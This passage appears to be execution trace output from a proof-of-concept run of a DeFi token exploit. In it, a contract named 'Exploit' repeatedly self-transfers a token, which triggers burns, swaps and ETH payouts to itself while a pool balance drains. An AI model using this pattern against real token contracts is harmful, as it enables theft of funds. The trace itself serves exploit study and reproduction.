    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b9b3c4af95150a8dd4df → 0x00000000000000000000000000000000000000000000b9d4bf6b59c1c6a2a571
    │   │   @ 21: 0x0000000000000000000000000000000000000000000000001214d457691772e1 → 0x0000000000000000000000000000000000000000000000001215164b31cd1065
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000a4e5aad75fac6812df → 0x000000000000000000000000000000000000000000000094684cf5094e5daa96
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf6b4d03e5f372f32e6 → 0x000000000000000000000000000000000000000000013bf73374571501af82d3
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141a7bb7c62dad8ff98c → 0x00000000000000000000000000000000000000000000141afa5bdee378104979
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001bc0cc0101953f38cd2f → 0x000000000000000000000000000000000000000000001bb04ea31f3ee12e64e6
    │   │   @ 17: 0x0000000000000000000000000000000000000000000000863c79deb9565de524 → 0x000000000000000000000000000000000000000000000086429e0cff290b567e
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000001215583efa82ade9
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x0000000000000000000000000000000000000000000000001215164b31cd1065 → 0x0000000000000000000000000000000000000000000000001215583efa82ade9
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001bb04ea31f3ee12e64e6 → 0x000000000000000000000000000000000000000000001b9fd1453ce88323fc9d
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf73374571501af82d3 → 0x000000000000000000000000000000000000000000013bf7b2186fcacc2fd2c0
    │   │   @ 17: 0x000000000000000000000000000000000000000000000086429e0cff290b567e → 0x00000000000000000000000000000000000000000000008648c23b44fbb8c7d8
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000094684cf5094e5daa96 → 0x000000000000000000000000000000000000000000000083eaef12b2f053424d
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b9d4bf6b59c1c6a2a571 → 0x00000000000000000000000000000000000000000000b9f5ba271e6e82b77603
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141afa5bdee378104979 → 0x00000000000000000000000000000000000000000000141b78fff79942909966
    │   │   @ 21: 0x0000000000000000000000000000000000000000000000001215164b31cd1065 → 0x0000000000000000000000000000000000000000000000001215583efa82ade9
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x00000000000000000000000000000000000000000000000012159a32c3384b6d
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x0000000000000000000000000000000000000000000000001215583efa82ade9 → 0x00000000000000000000000000000000000000000000000012159a32c3384b6d
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001b9fd1453ce88323fc9d → 0x000000000000000000000000000000000000000000001b8f53e75a9225199454
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf7b2186fcacc2fd2c0 → 0x000000000000000000000000000000000000000000013bf830bc888096b022ad
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b9f5ba271e6e82b77603 → 0x00000000000000000000000000000000000000000000ba16b4e2e31b3ecc4695
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141b78fff79942909966 → 0x00000000000000000000000000000000000000000000141bf7a4104f0d10e953
    │   │   @ 21: 0x0000000000000000000000000000000000000000000000001215583efa82ade9 → 0x00000000000000000000000000000000000000000000000012159a32c3384b6d
    │   │   @ 17: 0x00000000000000000000000000000000000000000000008648c23b44fbb8c7d8 → 0x0000000000000000000000000000000000000000000000864ee6698ace663932
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000083eaef12b2f053424d → 0x0000000000000000000000000000000000000000000000736d91305c9248da04
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000001215dc268bede8f1
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x00000000000000000000000000000000000000000000000012159a32c3384b6d → 0x0000000000000000000000000000000000000000000000001215dc268bede8f1
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 21: 0x00000000000000000000000000000000000000000000000012159a32c3384b6d → 0x0000000000000000000000000000000000000000000000001215dc268bede8f1
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000ba16b4e2e31b3ecc4695 → 0x00000000000000000000000000000000000000000000ba37af9ea7c7fae11727
    │   │   @ 17: 0x0000000000000000000000000000000000000000000000864ee6698ace663932 → 0x000000000000000000000000000000000000000000000086550a97d0a113aa8c
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001b8f53e75a9225199454 → 0x000000000000000000000000000000000000000000001b7ed689783bc70f2c0b
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000736d91305c9248da04 → 0x000000000000000000000000000000000000000000000062f0334e06343e71bb
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf830bc888096b022ad → 0x000000000000000000000000000000000000000000013bf8af60a1366130729a
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141bf7a4104f0d10e953 → 0x00000000000000000000000000000000000000000000141c76482904d7913940
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x00000000000000000000000000000000000000000000000012161e1a54a38675
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x0000000000000000000000000000000000000000000000001215dc268bede8f1 → 0x00000000000000000000000000000000000000000000000012161e1a54a38675
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000ba37af9ea7c7fae11727 → 0x00000000000000000000000000000000000000000000ba58aa5a6c74b6f5e7b9
    │   │   @ 21: 0x0000000000000000000000000000000000000000000000001215dc268bede8f1 → 0x00000000000000000000000000000000000000000000000012161e1a54a38675
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141c76482904d7913940 → 0x00000000000000000000000000000000000000000000141cf4ec41baa211892d
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001b7ed689783bc70f2c0b → 0x000000000000000000000000000000000000000000001b6e592b95e56904c3c2
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000062f0334e06343e71bb → 0x00000000000000000000000000000000000000000000005272d56bafd6340972
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf8af60a1366130729a → 0x000000000000000000000000000000000000000000013bf92e04b9ec2bb0c287
    │   │   @ 17: 0x000000000000000000000000000000000000000000000086550a97d0a113aa8c → 0x0000000000000000000000000000000000000000000000865b2ec61673c11be6
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000001216600e1d5923f9
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x00000000000000000000000000000000000000000000000012161e1a54a38675 → 0x0000000000000000000000000000000000000000000000001216600e1d5923f9
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000ba58aa5a6c74b6f5e7b9 → 0x00000000000000000000000000000000000000000000ba79a5163121730ab84b
    │   │   @ 21: 0x00000000000000000000000000000000000000000000000012161e1a54a38675 → 0x0000000000000000000000000000000000000000000000001216600e1d5923f9
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001b6e592b95e56904c3c2 → 0x000000000000000000000000000000000000000000001b5ddbcdb38f0afa5b79
    │   │   @ 17: 0x0000000000000000000000000000000000000000000000865b2ec61673c11be6 → 0x0000000000000000000000000000000000000000000000866152f45c466e8d40
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000005272d56bafd6340972 → 0x000000000000000000000000000000000000000000000041f57789597829a129
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf92e04b9ec2bb0c287 → 0x000000000000000000000000000000000000000000013bf9aca8d2a1f6311274
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141cf4ec41baa211892d → 0x00000000000000000000000000000000000000000000141d73905a706c91d91a
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000001216a201e60ec17d
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x0000000000000000000000000000000000000000000000001216600e1d5923f9 → 0x0000000000000000000000000000000000000000000000001216a201e60ec17d
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001b5ddbcdb38f0afa5b79 → 0x000000000000000000000000000000000000000000001b4d5e6fd138aceff330
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141d73905a706c91d91a → 0x00000000000000000000000000000000000000000000141df234732637122907
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000041f57789597829a129 → 0x0000000000000000000000000000000000000000000000317819a7031a1f38e0
    │   │   @ 17: 0x0000000000000000000000000000000000000000000000866152f45c466e8d40 → 0x000000000000000000000000000000000000000000000086677722a2191bfe9a
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000ba79a5163121730ab84b → 0x00000000000000000000000000000000000000000000ba9a9fd1f5ce2f1f88dd
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bf9aca8d2a1f6311274 → 0x000000000000000000000000000000000000000000013bfa2b4ceb57c0b16261
    │   │   @ 21: 0x0000000000000000000000000000000000000000000000001216600e1d5923f9 → 0x0000000000000000000000000000000000000000000000001216a201e60ec17d
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000001216e3f5aec45f01
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x0000000000000000000000000000000000000000000000001216a201e60ec17d → 0x0000000000000000000000000000000000000000000000001216e3f5aec45f01
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001b4d5e6fd138aceff330 → 0x000000000000000000000000000000000000000000001b3ce111eee24ee58ae7
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000ba9a9fd1f5ce2f1f88dd → 0x00000000000000000000000000000000000000000000babb9a8dba7aeb34596f
    │   │   @ 17: 0x000000000000000000000000000000000000000000000086677722a2191bfe9a → 0x0000000000000000000000000000000000000000000000866d9b50e7ebc96ff4
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bfa2b4ceb57c0b16261 → 0x000000000000000000000000000000000000000000013bfaa9f1040d8b31b24e
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000317819a7031a1f38e0 → 0x000000000000000000000000000000000000000000000020fabbc4acbc14d097
    │   │   @ 21: 0x0000000000000000000000000000000000000000000000001216a201e60ec17d → 0x0000000000000000000000000000000000000000000000001216e3f5aec45f01
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141df234732637122907 → 0x00000000000000000000000000000000000000000000141e70d88bdc019278f4
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x000000000000000000000000000000000000000000000000121725e97779fc85
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x0000000000000000000000000000000000000000000000001216e3f5aec45f01 → 0x000000000000000000000000000000000000000000000000121725e97779fc85
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bfaa9f1040d8b31b24e → 0x000000000000000000000000000000000000000000013bfb28951cc355b2023b
    │   │   @ 21: 0x0000000000000000000000000000000000000000000000001216e3f5aec45f01 → 0x000000000000000000000000000000000000000000000000121725e97779fc85
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000020fabbc4acbc14d097 → 0x0000000000000000000000000000000000000000000000107d5de2565e0a684e
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001b3ce111eee24ee58ae7 → 0x000000000000000000000000000000000000000000001b2c63b40c8bf0db229e
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000babb9a8dba7aeb34596f → 0x00000000000000000000000000000000000000000000badc95497f27a7492a01
    │   │   @ 17: 0x0000000000000000000000000000000000000000000000866d9b50e7ebc96ff4 → 0x00000000000000000000000000000000000000000000008673bf7f2dbe76e14e
    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141e70d88bdc019278f4 → 0x00000000000000000000000000000000000000000000141eef7ca491cc12c8e1
    │   └─ ← [Return] true
    ├─ [36874] 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3::transfer(0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, 304181530467500714057 [3.041e20])
    │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─ emit Swap(param0: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 0, param3: 953226125332733990 [9.532e17], param4: 304181530467500714057 [3.041e20])
    │   ├─ [0] 0x2712c550f5f92001057dbF277d479C7a35e37343::fallback{value: 47661306266636699}()
    │   │   └─ ← [Stop]
    │   ├─ [86] Exploit::fallback{value: 905564819066097291}()
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1, value: 9125445914025021421 [9.125e18])
    │   ├─ [3397] 0x70c4acA828e79e22d73dEDbd80FA99E585db3bf1::cae618f5(0000000000000000000000000000000000000000000000007ea418b5ca804fed)
    │   │   ├─  emit topic 0: 0x4a02abaeca79d731e9f710133314d8e1861f15fb1d3899fa232fe4b37839edac
    │   │   │        topic 1: 0x000000000000000000000000000000000000000000000000000041f3c8b59d84
    │   │   │        topic 2: 0x000000000000000000000000000000000000000000000000121767dd402f9a09
    │   │   │           data: 0x
    │   │   ├─  storage changes:
    │   │   │   @ 21: 0x000000000000000000000000000000000000000000000000121725e97779fc85 → 0x000000000000000000000000000000000000000000000000121767dd402f9a09
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: 0xA0Ba9d82014B33137B195b5753F3BC8Bf15700a3, to: 0x000000000000000000000000000000000000dEaD, value: 304181530467500714057 [3.041e20])
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000107d5de2565e0a684e → 5
    │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000badc95497f27a7492a01 → 0x00000000000000000000000000000000000000000000bafd900543d4635dfa93
